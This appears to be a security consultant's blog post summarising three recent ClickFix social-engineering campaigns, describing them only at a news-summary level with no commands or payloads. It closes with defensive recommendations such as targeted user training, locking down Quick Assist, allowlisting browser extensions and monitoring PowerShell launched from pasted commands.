John Z Black
Brunswick, ME • (207) 245-1010 • contact@johnzblack.com
There’s a social engineering trick dominating breach reports right now, and it’s embarrassingly simple.
A user sees a prompt. It says paste this command. Into PowerShell. Into the Windows Run dialog. Whatever. The prompt looks official. The user complies. Malware runs.
That’s ClickFix. And this past week alone, it showed up in three separate campaigns from different threat actors with different payloads. Same technique. Different bad guys. Uniformly terrible results.
Campaign one: Attackers flood a victim’s inbox with spam to create confusion, then message them on Microsoft Teams pretending to be IT support. “Open Quick Assist so we can help.” Once they’ve got remote access through that legitimate Windows tool, they drop a brand-new backdoor called A0Backdoor. The clever bit? It uses DNS MX records for command-and-control instead of the usual TXT records. Most DNS monitoring tools aren’t tuned for that. BlueVoyant links this to former BlackBasta ransomware operators regrouping with new tools.
Campaign two: The Termite ransomware crew is running fake CAPTCHA pages that tell victims to open a Run dialog and paste a command. That kicks off PowerShell, which downloads a shellcode loader, which deploys CastleRAT, which sets the table for ransomware. The whole chain runs on legitimate Windows utilities. Nothing exotic in the tooling. All the innovation is in the social engineering.
Campaign three: Two Chrome extensions, QuickLens and ShotBird, got purchased by threat actors and updated with malicious code. QuickLens strips security headers, fingerprints your browser, and pulls payloads from a C2 server every five minutes. The malicious code never appears in the extension source files. It only exists at runtime. ShotBird went simpler: fake Chrome update page, ClickFix-style prompt, malware named googleupdate.exe. It had “Featured” status in the Chrome Web Store before the ownership transfer.
So why does this keep working? There’s no zero-day here. No memory corruption. No sandbox escape. It’s just a user doing what a prompt tells them to do.
And that’s exactly the problem. Modern computing has trained people to comply with prompts. Prove you’re not a robot. Run this update. Re-authenticate. Call support. Every one of those normal interactions builds a reflex: do what the screen says. ClickFix takes that reflex and turns it into a weapon.
From the attacker’s side, it’s cheap, hard to detect at the endpoint, and works across industries. That’s why multiple unrelated groups have all landed on the same approach.
What to do about it:
Train your people against this specifically. Generic phishing training won’t cut it because there’s no malicious attachment or sketchy link. Just a prompt that says “paste this.” Users need to understand that no legitimate process will ever ask them to paste commands into a system prompt.
Lock down Quick Assist via group policy if you don’t use it. Manage Chrome extensions with an allowlist. And watch for unusual PowerShell execution from Run dialogs or pasted commands. If your EDR isn’t flagging that, fix it.
You can’t patch user behavior. But you can shrink the blast radius by limiting what’s available on their workstations and making the weird prompt feel wrong instead of routine.